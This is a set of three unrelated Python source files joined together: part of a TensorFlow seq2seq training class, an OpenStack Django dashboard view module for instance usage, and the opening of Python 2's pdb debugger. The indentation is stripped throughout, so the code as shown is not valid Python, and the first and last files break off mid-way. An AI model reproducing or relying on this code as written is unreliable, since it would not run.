self.target_weights, buckets,
lambda x, y: seq2seq_f(x, y, False),
softmax_loss_function=softmax_loss_function)
# Gradients and SGD update operation for training the model.
params = tf.trainable_variables()
if not forward_only:
self.gradient_norms = []
self.updates = []
#opt = tf.train.GradientDescentOptimizer(self.learning_rate)
#opt = tf.train.RMSPropOptimizer(self.learning_rate)
opt = tf.train.AdagradOptimizer(self.learning_rate)
for b in xrange(len(buckets)):
gradients = tf.gradients(self.losses[b], params)
clipped_gradients, norm = tf.clip_by_global_norm(gradients,
max_gradient_norm)
self.gradient_norms.append(norm)
self.updates.append(opt.apply_gradients(
zip(clipped_gradients, params), global_step=self.global_step))
self.saver = tf.train.Saver(tf.all_variables())
def step(self, session, encoder_inputs, decoder_inputs, target_weights,
bucket_id, forward_only):
"""Run a step of the model feeding the given inputs.
Args:
session: tensorflow session to use.
encoder_inputs: list of numpy int vectors to feed as encoder inputs.
decoder_inputs: list of numpy int vectors to feed as decoder inputs.
target_weights: list of numpy float vectors to feed as target weights.
bucket_id: which bucket of the model to use.
forward_only: whether to do the backward step or only forward.
Returns:
A triple consisting of gradient norm (or None if we did not do backward),
average perplexity, and the outputs.
Raises:
ValueError: if length of encoder_inputs, decoder_inputs, or
target_weights disagrees with bucket size for the specified bucket_id.
"""
# Check if the sizes match.
encoder_size, decoder_size = self.buckets[bucket_id]
if len(encoder_inputs) != encoder_size:
raise ValueError("Encoder length must be equal to the one in bucket,"
" %d != %d." % (len(encoder_inputs), encoder_size))
if len(decoder_inputs) != decoder_size:
raise ValueError("Decoder length must be equal to the one in bucket,"
" %d != %d." % (len(decoder_inputs), decoder_size))
if len(target_weights) != decoder_size:
raise ValueError("Weights length must be equal to the one in bucket,"
" %d != %d." % (len(target_weights), decoder_size))
# Input feed: encoder inputs, decoder inputs, target_weights, as provided.
input_feed = {}
for l in xrange(encoder_size):
input_feed[self.encoder_inputs[l].name] = encoder_inputs[l]
for l in xrange(decoder_size):
input_feed[self.decoder_inputs[l].name] = decoder_inputs[l]
input_feed[self.target_weights[l].name] = target_weights[l]
# Since our targets are decoder inputs shifted by one, we need one more.
last_target = self.decoder_inputs[decoder_size].name
input_feed[last_target] = np.zeros([self.batch_size], dtype=np.int32)
# Output feed: depends on whether we do a backward step or not.
if not forward_only:
output_feed = [self.updates[bucket_id], # Update Op that does SGD.
self.gradient_norms[bucket_id], # Gradient norm.
self.losses[bucket_id]] # Loss for this batch.
else:
output_feed = [self.losses[bucket_id]] # Loss for this batch.
for l in xrange(decoder_size): # Output logits.
output_feed.append(self.outputs[bucket_id][l])
outputs = session.run(output_feed, input_feed)
if not forward_only:
return outputs[1], outputs[2], None # Gradient norm, loss, no outputs.
else:
return None, outputs[0], outputs[1:] # No gradient norm, loss, outputs.
def get_batch(self, data, bucket_id):
"""Get a random batch of data from the specified bucket, prepare for step.
To feed data in step(..) it must be a list of batch-major vectors, while
data here contains single length-major cases. So the main logic of this
function is to re-index data cases to be in the proper format for feeding.
Args:
data: a tuple of size len(self.buckets) in which each element contains
lists of pairs of input and output data that we use to create a batch.
bucket_id: integer, which bucket to get the batch for.
Returns:
The triple (encoder_inputs, decoder_inputs, target_weights) for
the constructed batch that has the proper format to call step(...) later.
"""
encoder_size, decoder_size = self.buckets[bucket_id]
encoder_inputs, decoder_inputs = [], []
# Get a random batch of encoder and decoder inputs from data,
# pad them if needed, reverse encoder inputs and add GO to decoder.
for _ in xrange(self.batch_size):
encoder_input, decoder_input = random.choice(data[bucket_id])
# Encoder inputs are padded and then reversed.
encoder_pad = [data_utils.PAD_ID] * (encoder_size - len(encoder_input))
encoder_inputs.append(list(reversed(encoder_input + encoder_pad)))
# Decoder inputs get an extra "GO" symbol, and are padded then.
decoder_pad_size = decoder_size - len(decoder_input) - 1
decoder_inputs.append([data_utils.GO_ID] + decoder_input +
[data_utils.PAD_ID] * decoder_pad_size)
# Now we create batch-major vectors from the data selected above.
batch_encoder_inputs, batch_decoder_inputs, batch_weights = [], [], []
# Batch encoder inputs are just re-indexed encoder_inputs.
for length_idx in xrange(encoder_size):
batch_encoder_inputs.append(
np.array([encoder_inputs[batch_idx][length_idx]
for batch_idx in xrange(self.batch_size)], dtype=np.int32))
# Batch decoder inputs are re-indexed decoder_inputs, we create weights.
for length_idx in xrange(decoder_size):
batch_decoder_inputs.append(
np.array([decoder_inputs[batch_idx][length_idx]
for batch_idx in xrange(self.batch_size)], dtype=np.int32))
# Create target_weights to be 0 for targets that are padding.
batch_weight = np.ones(self.batch_size, dtype=np.float32)
for batch_idx in xrange(self.batch_size):
# We set weight to 0 if the corresponding target is a PAD symbol.
# The corresponding target is decoder_input shifted by 1 forward.
if length_idx < decoder_size - 1:
target = decoder_inputs[batch_idx][length_idx + 1]
if length_idx == decoder_size - 1 or target == data_utils.PAD_ID:
batch_weight[batch_idx] = 0.0
batch_weights.append(batch_weight)
return batch_encoder_inputs, batch_decoder_inputs, batch_weights
|
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2011 Fourth Paradigm Development, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django import template
from django import http
from django.conf import settings
from django.contrib.auth.decorators import login_required
from django.shortcuts import render_to_response
from django.utils.translation import ugettext as _
import datetime
import logging
from django.contrib import messages
from django_openstack import api
from django_openstack import forms
from django_openstack.dash.views import instances as dash_instances
from openstackx.api import exceptions as api_exceptions
TerminateInstance = dash_instances.TerminateInstance
RebootInstance = dash_instances.RebootInstance
LOG = logging.getLogger('django_openstack.syspanel.views.instances')
def _next_month(date_start):
y = date_start.year + (date_start.month + 1)/13
m = ((date_start.month + 1)%13)
if m == 0:
m = 1
return datetime.date(y, m, 1)
def _current_month():
today = datetime.date.today()
return datetime.date(today.year, today.month,1)
def _get_start_and_end_date(request):
try:
date_start = datetime.date(int(request.GET['date_year']), int(request.GET['date_month']), 1)
except:
today = datetime.date.today()
date_start = datetime.date(today.year, today.month,1)
date_end = _next_month(date_start)
datetime_start = datetime.datetime.combine(date_start, datetime.time())
datetime_end = datetime.datetime.combine(date_end, datetime.time())
if date_end > datetime.date.today():
datetime_end = datetime.datetime.utcnow()
return (date_start, date_end, datetime_start, datetime_end)
@login_required
def usage(request):
(date_start, date_end, datetime_start, datetime_end) = _get_start_and_end_date(request)
service_list = []
usage_list = []
max_vcpus = max_gigabytes = 0
total_ram = 0
if date_start > _current_month():
messages.error(request, 'No data for the selected period')
date_end = date_start
datetime_end = datetime_start
else:
try:
service_list = api.service_list(request)
except api_exceptions.ApiException, e:
LOG.error('ApiException fetching service list in instance usage',
exc_info=True)
messages.error(request,
'Unable to get service info: %s' % e.message)
for service in service_list:
if service.type == 'nova-compute':
max_vcpus += service.stats['max_vcpus']
max_gigabytes += service.stats['max_gigabytes']
total_ram += settings.COMPUTE_HOST_RAM_GB
try:
usage_list = api.usage_list(request, datetime_start, datetime_end)
except api_exceptions.ApiException, e:
LOG.error('ApiException fetching usage list in instance usage'
' on date range "%s to %s"' % (datetime_start,
datetime_end),
exc_info=True)
messages.error(request, 'Unable to get usage info: %s' % e.message)
dateform = forms.DateForm()
dateform['date'].field.initial = date_start
global_summary = {'max_vcpus': max_vcpus, 'max_gigabytes': max_gigabytes,
'total_active_disk_size': 0, 'total_active_vcpus': 0,
'total_active_ram_size': 0}
for usage in usage_list:
# FIXME: api needs a simpler dict interface (with iteration) - anthony
# NOTE(mgius): Changed this on the api end. Not too much neater, but
# at least its not going into private member data of an external
# class anymore
#usage = usage._info
for k in usage._attrs:
v = usage.__getattr__(k)
if type(v) in [float, int]:
if not k in global_summary:
global_summary[k] = 0
global_summary[k] += v
max_disk_tb = used_disk_tb = available_disk_tb = 0
max_disk_tb = global_summary['max_gigabytes'] / float(1000)
used_disk_tb = global_summary['total_active_disk_size'] / float(1000)
available_disk_tb = (global_summary['max_gigabytes'] / float(1000) - \
global_summary['total_active_disk_size'] / float(1000))
used_ram = global_summary['total_active_ram_size'] / float(1024)
avail_ram = total_ram - used_ram
ram_unit = "GB"
if total_ram > 999:
ram_unit = "TB"
total_ram /= float(1024)
used_ram /= float(1024)
avail_ram /= float(1024)
return render_to_response(
'syspanel_usage.html',{
'dateform': dateform,
'usage_list': usage_list,
'global_summary': global_summary,
'available_cores': global_summary['max_vcpus'] - global_summary['total_active_vcpus'],
'available_disk': global_summary['max_gigabytes'] - global_summary['total_active_disk_size'],
'max_disk_tb': max_disk_tb,
'used_disk_tb': used_disk_tb,
'available_disk_tb': available_disk_tb,
'total_ram': total_ram,
'used_ram': used_ram,
'avail_ram': avail_ram,
'ram_unit': ram_unit,
'external_links': settings.EXTERNAL_MONITORING,
}, context_instance = template.RequestContext(request))
@login_required
def tenant_usage(request, tenant_id):
(date_start, date_end, datetime_start, datetime_end) = _get_start_and_end_date(request)
if date_start > _current_month():
messages.error(request, 'No data for the selected period')
date_end = date_start
datetime_end = datetime_start
dateform = forms.DateForm()
dateform['date'].field.initial = date_start
usage = {}
try:
usage = api.usage_get(request, tenant_id, datetime_start, datetime_end)
except api_exceptions.ApiException, e:
LOG.error('ApiException getting usage info for tenant "%s"'
' on date range "%s to %s"' % (tenant_id,
datetime_start,
datetime_end))
messages.error(request, 'Unable to get usage info: %s' % e.message)
running_instances = []
terminated_instances = []
if hasattr(usage, 'instances'):
now = datetime.datetime.now()
for i in usage.instances:
# this is just a way to phrase uptime in a way that is compatible
# with the 'timesince' filter. Use of local time intentional
i['uptime_at'] = now - datetime.timedelta(seconds=i['uptime'])
if i['ended_at']:
terminated_instances.append(i)
else:
running_instances.append(i)
return render_to_response('syspanel_tenant_usage.html', {
'dateform': dateform,
'usage': usage,
'instances': running_instances + terminated_instances,
'tenant_id': tenant_id,
}, context_instance = template.RequestContext(request))
@login_required
def index(request):
for f in (TerminateInstance, RebootInstance):
_, handled = f.maybe_handle(request)
if handled:
return handled
instances = []
try:
instances = api.server_list(request)
except Exception as e:
LOG.error('Unspecified error in instance index', exc_info=True)
messages.error(request, 'Unable to get instance list: %s' % e.message)
# We don't have any way of showing errors for these, so don't bother
# trying to reuse the forms from above
terminate_form = TerminateInstance()
reboot_form = RebootInstance()
return render_to_response('syspanel_instances.html', {
'instances': instances,
'terminate_form': terminate_form,
'reboot_form': reboot_form,
}, context_instance=template.RequestContext(request))
@login_required
def refresh(request):
for f in (TerminateInstance, RebootInstance):
_, handled = f.maybe_handle(request)
if handled:
return handled
instances = []
try:
instances = api.server_list(request)
except Exception as e:
messages.error(request, 'Unable to get instance list: %s' % e.message)
# We don't have any way of showing errors for these, so don't bother
# trying to reuse the forms from above
terminate_form = TerminateInstance()
reboot_form = RebootInstance()
return render_to_response('_syspanel_instance_list.html', {
'instances': instances,
'terminate_form': terminate_form,
'reboot_form': reboot_form,
}, context_instance=template.RequestContext(request))
|
|
#! /usr/bin/env python
"""A Python debugger."""
# (See pdb.doc for documentation.)
import sys
import linecache
import cmd
import bdb
from repr import Repr
import os
import re
import pprint
import traceback
class Restart(Exception):
"""Causes a debugger to be restarted for the debugged python program."""
pass
# Create a custom safe Repr instance and increase its maxstring.
# The default of 30 truncates error messages too easily.
_repr = Repr()
_repr.maxstring = 200
_saferepr = _repr.repr
__all__ = ["run", "pm", "Pdb", "runeval", "runctx", "runcall", "set_trace",
"post_mortem", "help"]
def find_function(funcname, filename):
cre = re.compile(r'def\s+%s\s*[(]' % re.escape(funcname))
try:
fp = open(filename)
except IOError:
return None
# consumer of this info expects the first line to be 1
lineno = 1
answer = None
while 1:
line = fp.readline()
if line == '':
break
if cre.match(line):
answer = funcname, filename, lineno
break
lineno = lineno + 1
fp.close()
return answer
# Interaction prompt line will separate file and call info from code
# text using value of line_prefix string. A newline and arrow may
# be to your liking. You can set it once pdb is imported using the
# command "pdb.line_prefix = '\n% '".
# line_prefix = ': ' # Use this to get the old situation back
line_prefix = '\n-> ' # Probably a better default
class Pdb(bdb.Bdb, cmd.Cmd):
def __init__(self, completekey='tab', stdin=None, stdout=None):
bdb.Bdb.__init__(self)
cmd.Cmd.__init__(self, completekey, stdin, stdout)
if stdout:
self.use_rawinput = 0
self.prompt = '(Pdb) '
self.aliases = {}
self.mainpyfile = ''
self._wait_for_mainpyfile = 0
# Try to load readline if it exists
try:
import readline
except ImportError:
pass
# Read $HOME/.pdbrc and ./.pdbrc
self.rcLines = []
if 'HOME' in os.environ:
envHome = os.environ['HOME']
try:
rcFile = open(os.path.join(envHome, ".pdbrc"))
except IOError:
pass
else:
for line in rcFile.readlines():
self.rcLines.append(line)
rcFile.close()
try:
rcFile = open(".pdbrc")
except IOError:
pass
else:
for line in rcFile.readlines():
self.rcLines.append(line)
rcFile.close()
self.commands = {} # associates a command list to breakpoint numbers
self.commands_doprompt = {} # for each bp num, tells if the prompt must be disp. after execing the cmd list
self.commands_silent = {} # for each bp num, tells if the stack trace must be disp. after execing the cmd list
self.commands_defining = False # True while in the process of defining a command list
self.commands_bnum = None # The breakpoint number for which we are defining a list
def reset(self):
bdb.Bdb.reset(self)
self.forget()
def forget(self):
self.lineno = None
self.stack = []
self.curindex = 0
self.curframe = None
def setup(self, f, t):
self.forget()
self.stack, self.curindex = self.get_stack(f, t)
self.curframe = self.stack[self.curindex][0]
self.execRcLines()
# Can be executed earlier than 'setup' if desired
def execRcLines(self):
if self.rcLines:
# Make local copy because of recursion
rcLines = self.rcLines
# executed only once
self.rcLines = []
for line in rcLines:
line = line[:-1]
if len(line) > 0 and line[0] != '#':
self.onecmd(line)
# Override Bdb methods
def user_call(self, frame, argument_list):
"""This method is called when there is the remote possibility
that we ever need to stop in this function."""
if self._wait_for_mainpyfile:
return
if self.stop_here(frame):
print >>self.stdout, '--Call--'
self.interaction(frame, None)
def user_line(self, frame):
"""This function is called when we stop or break at this line."""
if self._wait_for_mainpyfile:
if (self.mainpyfile != self.canonic(frame.f_code.co_filename)
or frame.f_lineno<= 0):
return
self._wait_for_mainpyfile = 0
if self.bp_commands(frame):
self.interaction(frame, None)
def bp_commands(self,frame):
""" Call every command that was set for the current active breakpoint (if there is one)
Returns True if the normal interaction function must be called, False otherwise """
#self.currentbp is set in bdb.py in bdb.break_here if a breakpoint was hit
if getattr(self,"currentbp",False) and self.currentbp in self.commands:
currentbp = self.currentbp
self.currentbp = 0
lastcmd_back = self.lastcmd
self.setup(frame, None)
for line in self.commands[currentbp]:
self.onecmd(line)
self.lastcmd = lastcmd_back
if not self.commands_silent[currentbp]:
self.print_stack_entry(self.stack[self.curindex])
if self.commands_doprompt[currentbp]:
self.cmdloop()
self.forget()
return
return 1
def user_return(self, frame, return_value):
"""This function is called when a return trap is set here."""
if self._wait_for_mainpyfile:
return
frame.f_locals['__return__'] = return_value
print >>self.stdout, '--Return--'
self.interaction(frame, None)
def user_exception(self, frame, exc_info):
"""This function is called if an exception occurs,
but only if we are to stop at or just below this level."""
if self._wait_for_mainpyfile:
return
exc_type, exc_value, exc_traceback = exc_info
frame.f_locals['__exception__'] = exc_type, exc_value
if type(exc_type) == type(''):
exc_type_name = exc_type
else: exc_type_name = exc_type.__name__
print >>self.stdout, exc_type_name + ':', _saferepr(exc_value)
self.interaction(frame, exc_traceback)
# General interaction function
def interaction(self, frame, traceback):
self.setup(frame, traceback)
self.print_stack_entry(self.stack[self.curindex])
self.cmdloop()
self.forget()
def displayhook(self, obj):
"""Custom displayhook for the exec in default(), which prevents
assignment of the _ variable in the builtins.
"""
# reproduce the behavior of the standard displayhook, not printing None
if obj is not None:
print repr(obj)
def default(self, line):
if line[:1] == '!': line = line[1:]
locals = self.curframe.f_locals
globals = self.curframe.f_globals
try:
code = compile(line + '\n', '<stdin>', 'single')
save_stdout = sys.stdout
save_stdin = sys.stdin
save_displayhook = sys.displayhook
try:
sys.stdin = self.stdin
sys.stdout = self.stdout
sys.displayhook = self.displayhook
exec code in globals, locals
finally:
sys.stdout = save_stdout
sys.stdin = save_stdin
sys.displayhook = save_displayhook
except:
t, v = sys.exc_info()[:2]
if type(t) == type(''):
exc_type_name = t
else: exc_type_name = t.__name__
print >>self.stdout, '***', exc_type_name + ':', v
def precmd(self, line):
"""Handle alias expansion and ';;' separator."""
if not line.strip():
return line
args = line.split()
while args[0] in self.aliases:
line = self.aliases[args[0]]
ii = 1
for tmpArg in args[1:]:
line = line.replace("%" + str(ii),
tmpArg)
ii = ii + 1
line = line.replace("%*", ' '.join(args[1:]))
args = line.split()
# split into ';;' separated commands
# unless it's an alias command
if args[0] != 'alias':
marker = line.find(';;')
if marker >= 0:
# queue up everything after marker
next = line[marker+2:].lstrip()
self.cmdqueue.append(next)
line = line[:marker].rstrip()
return line
def onecmd(self, line):
"""Interpret the argument as though it had been typed in response
to the prompt.
Checks whether this line is typed at the normal prompt or in
a breakpoint command list definition.
"""
if not self.commands_defining:
return cmd.Cmd.onecmd(self, line)
else:
return self.handle_command_def(line)
def handle_command_def(self,line):
"""Handles one command line during command list definition."""
cmd, arg, line = self.parseline(line)
if not cmd:
return
if cmd == 'silent':
self.commands_silent[self.commands_bnum] = True
return # continue to handle other cmd def in the cmd list
elif cmd == 'end':
self.cmdqueue = []
return 1 # end of cmd list
cmdlist = self.commands[self.commands_bnum]
if arg:
cmdlist.append(cmd+' '+arg)
else:
cmdlist.append(cmd)
# Determine if we must stop
try:
func = getattr(self, 'do_' + cmd)
except AttributeError:
func = self.default
if func.func_name in self.commands_resuming : # one of the resuming commands.
self.commands_doprompt[self.commands_bnum] = False
self.cmdqueue = []
return 1
return
# Command definitions, called by cmdloop()
# The argument is the remaining string on the command line
# Return true to exit from the command loop
do_h = cmd.Cmd.do_help
def do_commands(self, arg):
"""Defines a list of commands associated to a breakpoint
Those commands will be executed whenever the breakpoint causes the program to stop execution."""
if not arg:
bnum = len(bdb.Breakpoint.bpbynumber)-1
else:
try:
bnum = int(arg)
except:
print >>self.stdout, "Usage : commands [bnum]\n ...\n end"
return
self.commands_bnum = bnum
self.commands[bnum] = []
self.commands_doprompt[bnum] = True
self.commands_silent[bnum] = False
prompt_back = self.prompt
self.prompt = '(com) '
self.commands_defining = True
try:
self.cmdloop()
finally:
self.commands_defining = False
self.prompt = prompt_back
def do_break(self, arg, temporary = 0):
# break [ ([filename:]lineno | function) [, "condition"] ]
if not arg:
if self.breaks: # There's at least one
print >>self.stdout, "Num Type Disp Enb Where"
for bp in bdb.Breakpoint.bpbynumber:
if bp:
bp.bpprint(self.stdout)
return
# parse arguments; comma has lowest precedence
# and cannot occur in filename
filename = None
lineno = None
cond = None
comma = arg.find(',')
if comma > 0:
# parse stuff after comma: "condition"
cond = arg[comma+1:].lstrip()
arg = arg[:comma].rstrip()
# parse stuff before comma: [filename:]lineno | function
colon = arg.rfind(':')
funcname = None
if colon >= 0:
filename = arg[:colon].rstrip()
f = self.lookupmodule(filename)
if not f:
print >>self.stdout, '*** ', repr(filename),
print >>self.stdout, 'not found from sys.path'
return
else:
filename = f
arg = arg[colon+1:].lstrip()
try:
lineno = int(arg)
except ValueError, msg:
print >>self.stdout, '*** Bad lineno:', arg
return
else:
# no colon; can be lineno or function
try:
lineno = int(arg)
except ValueError:
try:
func = eval(arg,
self.curframe.f_globals,
self.curframe.f_locals)
except:
func = arg
try:
if hasattr(func, 'im_func'):
func = func.im_func
code = func.func_code
#use co_name to identify the bkpt (function names
#could be aliased, but co_name is invariant)
funcname = code.co_name
lineno = code.co_firstlineno
filename = code.co_filename
except:
# last thing to try
(ok, filename, ln) = self.lineinfo(arg)
if not ok:
print >>self.stdout, '*** The specified object',
print >>self.stdout, repr(arg),
print >>self.stdout, 'is not a function'
print >>self.stdout, 'or was not found along sys.path.'
return
funcname = ok # ok contains a function name
lineno = int(ln)
if not filename:
filename = self.defaultFile()
# Check for reasonable breakpoint
line = self.checkline(filename, lineno)
if line:
# now set the break point
err = self.set_break(filename, line, temporary, cond, funcname)
if err: print >>self.stdout, '***', err
else:
bp = self.get_breaks(filename, line)[-1]
print >>self.stdout, "Breakpoint %d at %s:%d" % (bp.number,
bp.file,
bp.line)
# To be overridden in derived debuggers
def defaultFile(self):
"""Produce a reasonable default."""
filename = self.curframe.f_code.co_filename
if filename == '<string>' and self.mainpyfile:
filename = self.mainpyfile
return filename
do_b = do_break
def do_tbreak(self, arg):
self.do_break(arg, 1)
def lineinfo(self, identifier):
failed = (None, None, None)
# Input is identifier, may be in single quotes
idstring = identifier.split("'")
if len(idstring) == 1:
# not in single quotes
id = idstring[0].strip()
elif len(idstring) == 3:
# quoted
id = idstring[1].strip()
else:
return failed
if id == '': return failed
parts = id.split('.')
# Protection for derived debuggers
if parts[0] == 'self':
del parts[0]
if len(parts) == 0:
return failed
# Best first guess at file to look at
fname = self.defaultFile()
if len(parts) == 1:
item = parts[0]
else:
# More than one part.
# First is module, second is method/class
f = self.lookupmodule(parts[0])
if f:
fname = f
item = parts[1]
answer = find_function(item, fname)
return answer or failed
def checkline(self, filename, lineno):
"""Check whether specified line seems to be executable.
Return `lineno` if it is, 0 if not (e.g. a docstring, comment, blank
line or EOF). Warning: testing is not comprehensive.
"""
# this method should be callable before starting debugging, so default
# to "no globals" if there is no current frame
globs = self.curframe.f_globals if hasattr(self, 'curframe') else None
line = linecache.getline(filename, lineno, globs)
if not line:
print >>self.stdout, 'End of file'
return 0
line = line.strip()
# Don't allow setting breakpoint at a blank line
if (not line or (line[0] == '#') or
(line[:3] == '"""') or line[:3] == "'''"):
print >>self.stdout, '*** Blank or comment'
return 0
return lineno
def do_enable(self, arg):
args = arg.split()
for i in args:
try:
i = int(i)
except ValueError:
print >>self.stdout, 'Breakpoint index %r is not a number' % i
continue
if not (0 <= i < len(bdb.Breakpoint.bpbynumber)):
print >>self.stdout, 'No breakpoint numbered', i
continue
bp = bdb.Breakpoint.bpbynumber[i]
if bp:
bp.enable()
def do_disable(self, arg):
args = arg.split()
for i in args:
try:
i = int(i)
except ValueError:
print >>self.stdout, 'Breakpoint index %r is not a number' % i
continue
if not (0 <= i < len(bdb.Breakpoint.bpbynumber)):
print >>self.stdout, 'No breakpoint numbered', i
continue
bp = bdb.Breakpoint.bpbynumber[i]
if bp:
bp.disable()
def do_condition(self, arg):
# arg is breakpoint number and condition
args = arg.split(' ', 1)
try:
bpnum = int(args[0].strip())
except ValueError:
# something went wrong
print >>self.stdout, \
'Breakpoint index %r is not a number' % args[0]
return
try:
cond = args[1]
except:
cond = None
try:
bp = bdb.Breakpoint.bpbynumber[bpnum]
except IndexError:
print >>self.stdout, 'Breakpoint index %r is not valid' % args[0]
return
if bp:
bp.cond = cond
if not cond:
print >>self.stdout, 'Breakpoint', bpnum,
print >>self.stdout, 'is now unconditional.'
def do_ignore(self,arg):
"""arg is bp number followed by ignore count."""
args = arg.split()
try:
bpnum = int(args[0].strip())
except ValueError:
# something went wrong
print >>self.stdout, \
'Breakpoint index %r is not a number' % args[0]
return
try:
count = int(args[1].strip())
except:
count = 0
try:
bp = bdb.Breakpoint.bpbynumber[bpnum]
except IndexError:
print >>self.stdout, 'Breakpoint index %r is not valid' % args[0]
return
if bp:
bp.ignore = count
if count > 0:
reply = 'Will ignore next '
if count > 1:
reply = reply + '%d crossings' % count
else:
reply = reply + '1 crossing'
print >>self.stdout, reply + ' of breakpoint %d.' % bpnum
else:
print >>self.stdout, 'Will stop next time breakpoint',
print >>self.stdout, bpnum, 'is reached.'
def do_clear(self, arg):
"""Three possibilities, tried in this order:
clear -> clear all breaks, ask for confirmation
clear file:lineno -> clear all breaks at file:lineno
clear bpno bpno ... -> clear breakpoints by number"""
if not arg:
try:
reply = raw_input('Clear all breaks? ')
except EOFError:
reply = 'no'
reply = reply.strip().lower()
if reply in ('y', 'yes'):
self.clear_all_breaks()
return
if ':' in arg:
# Make sure it works for "clear C:\foo\bar.py:12"
i = arg.rfind(':')
filename = arg[:i]
arg = arg[i+1:]
try:
lineno = int(arg)
except ValueError:
err = "Invalid line number (%s)" % arg
else:
err = self.clear_break(filename, lineno)
if err: print >>self.stdout, '***', err
return
numberlist = arg.split()
for i in numberlist:
try:
i = int(i)
except ValueError:
print >>self.stdout, 'Breakpoint index %r is not a number' % i
continue
if not (0 <= i < len(bdb.Breakpoint.bpbynumber)):
print >>self.stdout, 'No breakpoint numbered', i
continue
err = self.clear_bpbynumber(i)
if err:
print >>self.stdout, '***', err
else:
print >>self.stdout, 'Deleted breakpoint', i
do_cl = do_clear # 'c' is already an abbreviation for 'continue'
def do_where(self, arg):
self.print_stack_trace()
do_w = do_where
do_bt = do_where
def do_up(self, arg):
if self.curindex == 0:
print >>self.stdout, '*** Oldest frame'
else:
self.curindex = self.curindex - 1
self.curframe = self.stack[self.curindex][0]
self.print_stack_entry(self.stack[self.curindex])
self.lineno = None
do_u = do_up
def do_down(self, arg):
if self.curindex + 1 == len(self.stack):
print >>self.stdout, '*** Newest frame'
else:
self.curindex = self.curindex + 1
self.curframe = self.stack[self.curindex][0]
self.print_stack_entry(self.stack[self.curindex])
self.lineno = None
do_d = do_down
def do_until(self, arg):
self.set_until(self.curframe)
return 1
do_unt = do_until
def do_step(self, arg):
self.set_step()
return 1
do_s = do_step
def do_next(self, arg):
self.set_next(self.curframe)
return 1
do_n = do_next
def do_run(self, arg):
"""Restart program by raising an exception to be caught in the main debugger
loop. If arguments were given, set them in sys.argv."""
if arg:
import shlex
argv0 = sys.argv[0:1]
sys.argv = shlex.split(arg)
sys.argv[:0] = argv0
raise Restart
do_restart = do_run
def do_return(self, arg):
self.set_return(self.curframe)
return 1
do_r = do_return
def do_continue(self, arg):
self.set_continue()
return 1
do_c = do_cont = do_continue
def do_jump(self, arg):
if self.curindex + 1 != len(self.stack):
print >>self.stdout, "*** You can only jump within the bottom frame"
return
try:
arg = int(arg)
except ValueError:
print >>self.stdout, "*** The 'jump' command requires a line number."
else:
try:
# Do the jump, fix up our copy of the stack, and display the
# new position
self.curframe.f_lineno = arg
self.stack[self.curindex] = self.stack[self.curindex][0], arg
self.print_stack_entry(self.stack[self.curindex])
except ValueError, e:
print >>self.stdout, '*** Jump failed:', e
do_j = do_jump
def do_debug(self, arg):
sys.settrace(None)
globals = self.curframe.f_globals
locals = self.curframe.f_locals
p = Pdb(self.completekey, self.stdin, self.stdout)
p.prompt = "(%s) " % self.prompt.strip()
print >>self.stdout, "ENTERING RECURSIVE DEBUGGER"
sys.call_tracing(p.run, (arg, globals, locals))
print >>self.stdout, "LEAVING RECURSIVE DEBUGGER"
sys.settrace(self.trace_dispatch)
self.lastcmd = p.lastcmd
def do_quit(self, arg):
self._user_requested_quit = 1
self.set_quit()
return 1
do_q = do_quit
do_exit = do_quit
def do_EOF(self, arg):
print >>self.stdout
self._user_requested_quit = 1
self.set_quit()
return 1
def do_args(self, arg):
f = self.curframe
co = f.f_code
dict = f.f_locals
n = co.co_argcount
if co.co_flags & 4: n = n+1
if co.co_flags & 8: n = n+1
for i in range(n):
name = co.co_varnames[i]
print >>self.stdout, name, '=',
if name in dict: print >>self.stdout, dict[name]
else: print >>self.stdout, "*** undefined ***"
do_a = do_args
def do_retval(self, arg):
if '__return__' in self.curframe.f_locals:
print >>self.stdout, self.curframe.f_locals['__return__']
else:
print >>self.stdout, '*** Not yet returned!'
do_rv = do_retval
def _getval(self, arg):
try:
return eval(arg, self.curframe.f_globals,
self.curframe.f_locals)
except:
t, v = sys.exc_info()[:2]
if isinstance(t, str):
exc_type_name = t
else: exc_type_name = t.__name__
print >>self.stdout, '***', exc_type_name + ':', repr(v)
raise
def do_p(self, arg):
try:
print >>self.stdout, repr(self._getval(arg))
except:
pass
def do_pp(self, arg):
try:
pprint.pprint(self._getval(arg), self.stdout)
except:
pass
def do_list(self, arg):
self.lastcmd = 'list'
last = None
if arg:
try:
x = eval(arg, {}, {})
if type(x) == type(()):
first, last = x
first = int(first)
last = int(last)
if last < first:
# Assume it's a count
last = first + last
else:
first = max(1, int(x) - 5)
except:
print >>self.stdout, '*** Error in argument:', repr(arg)
return
elif self.lineno is None:
first = max(1, self.curframe.f_lineno - 5)
else:
first = self.lineno + 1
if last is None:
last = first + 10
filename = self.curframe.f_code.co_filename
breaklist = self.get_file_breaks(filename)
try:
for lineno in range(first, last+1):
line = linecache.getline(filename, lineno, self.curframe.f_globals)
if not line:
print >>self.stdout, '[EOF]'
break
else:
s = repr(lineno).rjust(3)
if len(s) < 4: s = s + ' '
if lineno in breaklist: s = s + 'B'
else: s = s + ' '
if lineno == self.curframe.f_lineno:
s = s + '->'
print >>self.stdout, s + '\t' + line,
self.lineno = lineno
except KeyboardInterrupt:
pass
do_l = do_list
def do_whatis(self, arg):
try:
value = eval(arg, self.curframe.f_globals,
self.curframe.f_locals)
except:
t, v = sys.exc_info()[:2]
if type(t) == type(''):
exc_type_name = t
else: exc_type_name = t.__name__
print >>self.stdout, '***', exc_type_name + ':', repr(v)
return
code = None
# Is it a function?
try: code = value.func_code
except: pass
if code:
print >>self.stdout, 'Function', code.co_name
return
# Is it an instance method?
try: code = value.im_func.func_code
except: pass
if code:
print >>self.stdout, 'Method', code.co_name
return
# None of the above...
print >>self.stdout, type(value)
def do_alias(self, arg):
args = arg.split()
if len(args) == 0:
keys = self.aliases.keys()
keys.sort()
for alias in keys:
print >>self.stdout, "%s = %s" % (alias, self.aliases[alias])
return
if args[0] in self.aliases and len(args) == 1:
print >>self.stdout, "%s = %s" % (args[0], self.aliases[args[0]])
else:
self.aliases[args[0]] = ' '.join(args[1:])
